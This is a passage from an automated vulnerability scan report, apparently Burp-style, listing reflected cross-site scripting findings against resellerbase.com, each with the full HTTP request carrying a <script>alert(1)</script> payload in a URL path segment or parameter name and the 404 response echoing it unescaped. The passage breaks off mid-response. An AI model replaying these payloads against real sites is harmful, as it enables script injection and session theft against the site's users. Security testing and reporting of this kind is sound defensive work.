Date: Wed, 17 Nov 2010 23:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild6d4d<script>alert(1)</script>90ac14b037d/18/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1505. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6088c<script>alert(1)</script>99663b3f148 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/186088c<script>alert(1)</script>99663b3f148/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/186088c<script>alert(1)</script>99663b3f148/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1506. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 92e95<script>alert(1)</script>f5d19630758 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes92e95<script>alert(1)</script>f5d19630758/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes92e95<script>alert(1)</script>f5d19630758/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1507. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e381c<script>alert(1)</script>d282dcfe169 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmose381c<script>alert(1)</script>d282dcfe169/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmose381c<script>alert(1)</script>d282dcfe169/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1508. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 97690<script>alert(1)</script>1e351ef9ba8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images97690<script>alert(1)</script>1e351ef9ba8/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images97690<script>alert(1)</script>1e351ef9ba8/rating/ was not found on this server.</p>
...[SNIP]...

2.1509. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f275f<script>alert(1)</script>6a188e8e35e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/ratingf275f<script>alert(1)</script>6a188e8e35e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/ratingf275f<script>alert(1)</script>6a188e8e35e/ was not found on this server.</p>
...[SNIP]...

2.1510. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6b1d2<script>alert(1)</script>a55a5365ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/rating/?6b1d2<script>alert(1)</script>a55a5365ea4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/?6b1d2<script>alert(1)</script>a55a5365ea4=1 was not found on this server.</p>
...[SNIP]...

2.1511. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f171c<script>alert(1)</script>4cdd5609f9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf171c<script>alert(1)</script>4cdd5609f9f/18/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf171c<script>alert(1)</script>4cdd5609f9f/18/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1512. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8ed71<script>alert(1)</script>e96e3587bc4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/188ed71<script>alert(1)</script>e96e3587bc4/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/188ed71<script>alert(1)</script>e96e3587bc4/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1513. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload db390<script>alert(1)</script>6672f4dc648 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themesdb390<script>alert(1)</script>6672f4dc648/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themesdb390<script>alert(1)</script>6672f4dc648/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1514. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 30700<script>alert(1)</script>271039ee35c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos30700<script>alert(1)</script>271039ee35c/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos30700<script>alert(1)</script>271039ee35c/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1515. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7420e<script>alert(1)</script>09801fbd1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images7420e<script>alert(1)</script>09801fbd1/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images7420e<script>alert(1)</script>09801fbd1/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1516. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 68df1<script>alert(1)</script>d5ba00b7b55 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/rating68df1<script>alert(1)</script>d5ba00b7b55/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating68df1<script>alert(1)</script>d5ba00b7b55/0.gif was not found on this server.</p>
...[SNIP]...

2.1517. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 8a7f5<script>alert(1)</script>64a680a9940 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/rating/0.gif8a7f5<script>alert(1)</script>64a680a9940 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/0.gif8a7f5<script>alert(1)</script>64a680a9940 was not found on this server.</p>
...[SNIP]...

2.1518. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 28c9c<script>alert(1)</script>c5b54340a82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/rating/0.gif?28c9c<script>alert(1)</script>c5b54340a82=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/rating/0.gif?28c9c<script>alert(1)</script>c5b54340a82=1 was not found on this server.</p>
...[SNIP]...

2.1519. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a1f42<script>alert(1)</script>324a86e6e34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila1f42<script>alert(1)</script>324a86e6e34/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila1f42<script>alert(1)</script>324a86e6e34/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1520. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc6df<script>alert(1)</script>10d6c1ed541 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18cc6df<script>alert(1)</script>10d6c1ed541/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18cc6df<script>alert(1)</script>10d6c1ed541/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1521. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ba4e3<script>alert(1)</script>75b558e9133 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themesba4e3<script>alert(1)</script>75b558e9133/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themesba4e3<script>alert(1)</script>75b558e9133/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1522. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f7423<script>alert(1)</script>3d93a7ee188 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmosf7423<script>alert(1)</script>3d93a7ee188/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmosf7423<script>alert(1)</script>3d93a7ee188/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1523. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f467f<script>alert(1)</script>36ea4786e0e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/imagesf467f<script>alert(1)</script>36ea4786e0e/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:18 GMT
Server: Apache/2
